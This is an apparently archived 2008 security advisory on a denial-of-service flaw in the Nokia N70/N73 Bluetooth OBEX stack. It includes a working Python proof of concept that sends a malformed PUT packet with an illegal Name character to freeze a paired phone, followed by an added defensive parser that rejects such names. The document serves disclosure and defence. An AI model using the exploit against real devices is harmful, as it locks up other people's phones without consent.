
Nokia N70/N73 Bluetooth Stack Denial Of Service

Posted Dec 12, 2008
Site nipc.org.cn

The Nokia N70/N73 Bluetooth stack OBEX implementation suffers from a denial of service vulnerability. Proof of concept code included.

tags | exploit, denial of service, proof of concept
SHA-256 | 53d44f61bf1cfead6383de01459b8edd7b789e80273f7968d8477ba590233237

Nokia N70/N73 Bluetooth Stack OBEX Implementation Denial of Service

------------------------------------------------------------------
I. Summary

Nokia N70 and N73 are two popular models from Nokia's N-series lineup of smartphones. A flaw has been found in the OBEX implementation of these two models, related to illegal characters in the Name header of a PUT request in an OBEX session. The OBEX implementation cannot handle these characters properly, and a successful exploit causes a denial of service (phone lockup).

------------------------------------------------------------------
II. Description

According to the IrOBEX specification, certain path characters (i.e. ':', '/' and '\') are not allowed in the Name header string. However, the OBEX implementation in the N70/N73, and possibly other models, fails to handle violations of this rule: if the Name string consists of one of the following Unicode characters:

0x0009 (Tab)
0x000a (Line feed)
0x000b (Vertical tab)
0x000c (Form feed)
0x000d (Carriage return)
0x003a (':')
0x005c ('\')

the Bluetooth stack crashes and the phone freezes. Note that in order to exploit this, the attacker first has to pair with the victim phone. The vulnerability can be illustrated by the following Python code (requires the PyBluez package; tested under Python 2.5.2 and PyBluez 0.15 with the Microsoft Bluetooth stack on Windows XP SP2):

# PoC code to demonstrate the flaw in the OBEX implementation of Nokia phones
# Tested under Windows XP SP2
# Coded by the penetration test team of NCNIPC (China)

# PyBluez is required to run the code (Python 2 syntax, as tested by the authors)
import binascii
import sys
from bluetooth import *

# Bluetooth address and OBEX channel of the target device
# Replace them with the appropriate values for your device
target = ("00:15:A0:F9:E6:03", 10)

# Make a connection
sock = BluetoothSocket(RFCOMM)
sock.connect(target)

# Connect to the OBEX service: opcode 0x80 (CONNECT, final), length 7,
# OBEX version 1.0, flags 0, maximum packet length 0xfffe
connect_pkg = "\x80\x00\x07\x10\x00\xff\xfe"
sock.send(connect_pkg)
con_recv = sock.recv(20)

if con_recv[0] == '\xa0':
    # Now we are connected (0xa0 = Success with the final bit set)

    # The name string that consists of a single 0x0009 character, which will
    # cause the phone to lock up
    name_str = "\x00\x09"

    # Construct and send the malformed packet: a Name header (0x01, 2-byte
    # length, UTF-16BE string, null terminator) followed by an End-of-Body
    # header (0x49, the hex below is a vCard for "Joe Bloggs"), wrapped in a
    # final PUT (0x82) whose length field covers the 3-byte opcode/length prefix
    name_header = "\x01\x00" + chr(len(name_str) + 5) + name_str + "\x00\x00"
    body_header = "\x49\x00\xa0\x42\x45\x47\x49\x4e\x3a\x56\x43\x41\x52\x44\x0d\x0a\x56\x45\x52\x53\x49\x4f\x4e\x3a\x32\x2e\x31\x0d\x0a\x4e\x3b\x45\x4e\x43\x4f\x44\x49\x4e\x47\x3d\x38\x42\x49\x54\x3b\x43\x48\x41\x52\x53\x45\x54\x3d\x55\x54\x46\x2d\x38\x3a\x42\x6c\x6f\x67\x67\x73\x3b\x4a\x6f\x65\x0d\x0a\x54\x45\x4c\x3b\x50\x52\x45\x46\x3b\x43\x45\x4c\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x54\x45\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x45\x4d\x41\x49\x4c\x3a\x72\x6f\x6f\x74\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0d\x0a\x45\x4e\x44\x3a\x56\x43\x41\x52\x44\x0d\x0a"
    put_pkg = "\x82\x00" + chr(len(name_header) + len(body_header) + 3) + name_header + body_header
    print "Packet dump: ", binascii.b2a_hex(put_pkg)
    sock.send(put_pkg)
    print "Packet sent"

    try:
        resp = sock.recv(20)
        print "Response dump: %s" % (binascii.b2a_hex(resp))
    except:
        print "Failed to receive response: ", sys.exc_info()[0]

sock.close()
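As an added example (not part of the NCNIPC advisory or its PoC), the receiving-side check a robust OBEX implementation should perform: walk the PUT's headers with bounds checks on every length field and refuse a Name header that contains any of the code points listed above, instead of crashing. build_put mirrors the PoC's packet layout so the check can be exercised offline; the function names and the sample names and vCard body are constructed here.

```python
import struct

# Code points the advisory above lists as locking up the N70/N73 OBEX stack
REJECTED_NAME_CHARS = {0x0009, 0x000A, 0x000B, 0x000C, 0x000D, 0x003A, 0x005C}

def build_put(name, body):
    """Final PUT (0x82) carrying a Name (0x01) and an End-of-Body (0x49) header,
    laid out the same way as the PoC's put_pkg (constructed test input)."""
    name_payload = name.encode("utf-16-be") + b"\x00\x00"   # null-terminated UTF-16BE
    name_hdr = b"\x01" + struct.pack(">H", len(name_payload) + 3) + name_payload
    body_hdr = b"\x49" + struct.pack(">H", len(body) + 3) + body
    total = len(name_hdr) + len(body_hdr) + 3
    return b"\x82" + struct.pack(">H", total) + name_hdr + body_hdr

def iter_headers(pkt):
    """Yield (header_id, payload) pairs from an OBEX request, bounds-checking
    every length field instead of trusting it."""
    total = struct.unpack(">H", pkt[1:3])[0]
    if total != len(pkt):
        raise ValueError("length field %d != %d bytes received" % (total, len(pkt)))
    pos = 3
    while pos < total:
        hid = pkt[pos]
        enc = hid >> 6      # 0/1: 2-byte length prefix; 2: 1-byte value; 3: 4-byte value
        if enc in (0, 1):
            hlen = struct.unpack(">H", pkt[pos + 1:pos + 3])[0]
            if hlen < 3 or pos + hlen > total:
                raise ValueError("header 0x%02x length out of bounds" % hid)
            yield hid, pkt[pos + 3:pos + hlen]
            pos += hlen
        else:
            size = 2 if enc == 2 else 5
            yield hid, pkt[pos + 1:pos + size]
            pos += size

def check_put_name(pkt):
    """Return (accepted, name) for a PUT. A receiver can refuse the request
    when the name is malformed or contains a rejected code point."""
    for hid, payload in iter_headers(pkt):
        if hid != 0x01:
            continue
        if len(payload) < 2 or len(payload) % 2 or payload[-2:] != b"\x00\x00":
            return False, None          # not a null-terminated UTF-16 string
        name = payload[:-2].decode("utf-16-be")
        return (not any(ord(c) in REJECTED_NAME_CHARS for c in name)), name
    return False, None                  # no Name header present
```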

------------------------------------------------------------------
III. Impact

Denial of service: the phone freezes and loses responsiveness; the only way to make it function normally again is to take out the battery, reinsert it and power the phone on.

------------------------------------------------------------------
IV. Affected

Nokia N70 and N73. Other phone models may also be affected due to code reuse.

------------------------------------------------------------------
V. Solution

Don't pair with suspicious Bluetooth devices. Disable Bluetooth if necessary.

------------------------------------------------------------------
VI. Credit

The penetration test team of NCNIPC (China) is credited for this vulnerability.
